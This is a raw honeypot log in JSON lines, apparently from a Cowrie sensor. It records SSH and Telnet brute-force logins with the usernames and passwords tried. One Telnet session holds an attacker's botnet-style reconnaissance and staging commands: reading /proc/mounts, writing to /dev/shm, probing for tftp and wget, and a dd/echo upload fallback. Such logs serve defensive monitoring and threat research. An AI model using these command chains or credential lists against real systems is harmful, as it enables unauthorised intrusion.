{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:48:56.455400Z","src_ip":"196.251.86.249","session":"9ae2ce6c4024"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51839,"dst_ip":"1.2.3.4","dst_port":23,"session":"4a682040567a","protocol":"telnet","message":"New connection: 212.227.235.229:51839 (1.2.3.4:23) [session: 4a682040567a]","sensor":"my-vps","timestamp":"2025-08-26T09:48:59.124168Z"}
{"eventid":"cowrie.login.failed","username":"tech","password":"tech","message":"login attempt [tech/tech] failed","sensor":"my-vps","timestamp":"2025-08-26T09:48:59.733246Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"54321","message":"login attempt [admin/54321] failed","sensor":"my-vps","timestamp":"2025-08-26T09:49:00.368397Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.login.success","username":"root","password":"zsun1188","message":"login attempt [root/zsun1188] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:49:01.441542Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:49:01.511668Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-26T09:49:01.698722Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-26T09:49:01.702014Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-26T09:49:01.703456Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-26T09:49:01.704691Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-26T09:49:01.705571Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-26T09:49:01.706520Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox CHVLO","message":"CMD: cat /proc/mounts; /bin/busybox CHVLO","sensor":"my-vps","timestamp":"2025-08-26T09:49:01.895238Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CHVLO","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CHVLO","sensor":"my-vps","timestamp":"2025-08-26T09:49:02.086019Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox CHVLO","message":"CMD: tftp; wget; /bin/busybox CHVLO","sensor":"my-vps","timestamp":"2025-08-26T09:49:02.273843Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-26T09:49:02.467697Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-26T09:49:02.471613Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"/bin/busybox CHVLO","message":"CMD: /bin/busybox CHVLO","sensor":"my-vps","timestamp":"2025-08-26T09:49:02.662760Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-26T09:49:02.665927Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-26T09:49:02.667469Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-26T09:49:02.668438Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/05e1e4258da3c7170fc75af2e5491d1d9c0c968af934be7c922d2e69d5f20300","size":3550,"shasum":"05e1e4258da3c7170fc75af2e5491d1d9c0c968af934be7c922d2e69d5f20300","duplicate":false,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/05e1e4258da3c7170fc75af2e5491d1d9c0c968af934be7c922d2e69d5f20300 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:49:02.670991Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.session.closed","duration":3.554847002029419,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:49:02.679175Z","src_ip":"212.227.235.229","session":"4a682040567a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44500,"dst_ip":"1.2.3.4","dst_port":22,"session":"af251f3923f3","protocol":"ssh","message":"New connection: 212.227.235.229:44500 (1.2.3.4:22) [session: af251f3923f3]","sensor":"my-vps","timestamp":"2025-08-26T09:49:36.174748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:49:37.039198Z","src_ip":"212.227.235.229","session":"af251f3923f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:49:37.040295Z","src_ip":"212.227.235.229","session":"af251f3923f3"}
{"eventid":"cowrie.login.success","username":"root","password":"19531954","message":"login attempt [root/19531954] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:49:41.417478Z","src_ip":"212.227.235.229","session":"af251f3923f3"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:49:42.263063Z","src_ip":"212.227.235.229","session":"af251f3923f3"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":49672,"dst_ip":"1.2.3.4","dst_port":22,"session":"debf4b62a34a","protocol":"ssh","message":"New connection: 196.251.86.249:49672 (1.2.3.4:22) [session: debf4b62a34a]","sensor":"my-vps","timestamp":"2025-08-26T09:49:55.422115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:49:55.923424Z","src_ip":"196.251.86.249","session":"debf4b62a34a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:49:55.924623Z","src_ip":"196.251.86.249","session":"debf4b62a34a"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123qwe","message":"login attempt [postgres/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T09:49:57.990329Z","src_ip":"196.251.86.249","session":"debf4b62a34a"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:49:59.579427Z","src_ip":"196.251.86.249","session":"debf4b62a34a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51337,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1099b4287ee","protocol":"ssh","message":"New connection: 212.227.235.229:51337 (1.2.3.4:22) [session: b1099b4287ee]","sensor":"my-vps","timestamp":"2025-08-26T09:50:49.339278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:50:52.368993Z","src_ip":"212.227.235.229","session":"b1099b4287ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:50:52.371527Z","src_ip":"212.227.235.229","session":"b1099b4287ee"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":50858,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f5af9709709","protocol":"ssh","message":"New connection: 196.251.86.249:50858 (1.2.3.4:22) [session: 7f5af9709709]","sensor":"my-vps","timestamp":"2025-08-26T09:50:59.103564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:50:59.726233Z","src_ip":"196.251.86.249","session":"7f5af9709709"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:50:59.727159Z","src_ip":"196.251.86.249","session":"7f5af9709709"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"passpass","message":"login attempt [postgres/passpass] failed","sensor":"my-vps","timestamp":"2025-08-26T09:51:01.248907Z","src_ip":"196.251.86.249","session":"7f5af9709709"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:51:02.775176Z","src_ip":"196.251.86.249","session":"7f5af9709709"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei12#$","message":"login attempt [root/Huawei12#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:51:02.948416Z","src_ip":"212.227.235.229","session":"b1099b4287ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:51:12.417503Z","src_ip":"212.227.235.229","session":"b1099b4287ee"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-26T09:51:12.418207Z","src_ip":"212.227.235.229","session":"b1099b4287ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"4.1","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:51:16.507268Z","src_ip":"212.227.235.229","session":"b1099b4287ee"}
{"eventid":"cowrie.session.closed","duration":"32.1","message":"Connection lost after 32.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:51:21.392719Z","src_ip":"212.227.235.229","session":"b1099b4287ee"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":51906,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1abdfa86e1d","protocol":"ssh","message":"New connection: 196.251.86.249:51906 (1.2.3.4:22) [session: b1abdfa86e1d]","sensor":"my-vps","timestamp":"2025-08-26T09:52:03.369537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:52:03.832473Z","src_ip":"196.251.86.249","session":"b1abdfa86e1d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:52:03.920608Z","src_ip":"196.251.86.249","session":"b1abdfa86e1d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"pass123","message":"login attempt [postgres/pass123] failed","sensor":"my-vps","timestamp":"2025-08-26T09:52:05.591004Z","src_ip":"196.251.86.249","session":"b1abdfa86e1d"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:52:07.000177Z","src_ip":"196.251.86.249","session":"b1abdfa86e1d"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":51088,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2379bac287e","protocol":"ssh","message":"New connection: 196.251.86.249:51088 (1.2.3.4:22) [session: c2379bac287e]","sensor":"my-vps","timestamp":"2025-08-26T09:53:07.610156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:53:08.024889Z","src_ip":"196.251.86.249","session":"c2379bac287e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:53:08.025831Z","src_ip":"196.251.86.249","session":"c2379bac287e"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"pass1234","message":"login attempt [postgres/pass1234] failed","sensor":"my-vps","timestamp":"2025-08-26T09:53:10.026567Z","src_ip":"196.251.86.249","session":"c2379bac287e"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:53:11.452904Z","src_ip":"196.251.86.249","session":"c2379bac287e"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":54338,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b5190711973","protocol":"ssh","message":"New connection: 196.251.86.249:54338 (1.2.3.4:22) [session: 0b5190711973]","sensor":"my-vps","timestamp":"2025-08-26T09:54:09.124601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:54:09.800462Z","src_ip":"196.251.86.249","session":"0b5190711973"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:54:09.801277Z","src_ip":"196.251.86.249","session":"0b5190711973"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"wasd","message":"login attempt [postgres/wasd] failed","sensor":"my-vps","timestamp":"2025-08-26T09:54:12.274049Z","src_ip":"196.251.86.249","session":"0b5190711973"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:54:14.099260Z","src_ip":"196.251.86.249","session":"0b5190711973"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54762,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b7a44896263","protocol":"ssh","message":"New connection: 217.72.205.35:54762 (1.2.3.4:22) [session: 4b7a44896263]","sensor":"my-vps","timestamp":"2025-08-26T09:54:30.531231Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:54:30.532275Z","src_ip":"217.72.205.35","session":"4b7a44896263"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":46278,"dst_ip":"1.2.3.4","dst_port":23,"session":"b1398859c8aa","protocol":"telnet","message":"New connection: 123.31.39.100:46278 (1.2.3.4:23) [session: b1398859c8aa]","sensor":"my-vps","timestamp":"2025-08-26T09:54:58.490013Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49413,"dst_ip":"1.2.3.4","dst_port":23,"session":"fa241ed70d15","protocol":"telnet","message":"New connection: 212.227.125.160:49413 (1.2.3.4:23) [session: fa241ed70d15]","sensor":"my-vps","timestamp":"2025-08-26T09:54:58.560718Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59779,"dst_ip":"1.2.3.4","dst_port":23,"session":"d71fe934166e","protocol":"telnet","message":"New connection: 212.227.235.229:59779 (1.2.3.4:23) [session: d71fe934166e]","sensor":"my-vps","timestamp":"2025-08-26T09:54:59.551712Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":56658,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ab65e3fb31e","protocol":"ssh","message":"New connection: 196.251.86.249:56658 (1.2.3.4:22) [session: 6ab65e3fb31e]","sensor":"my-vps","timestamp":"2025-08-26T09:55:11.367139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:55:12.044645Z","src_ip":"196.251.86.249","session":"6ab65e3fb31e"}
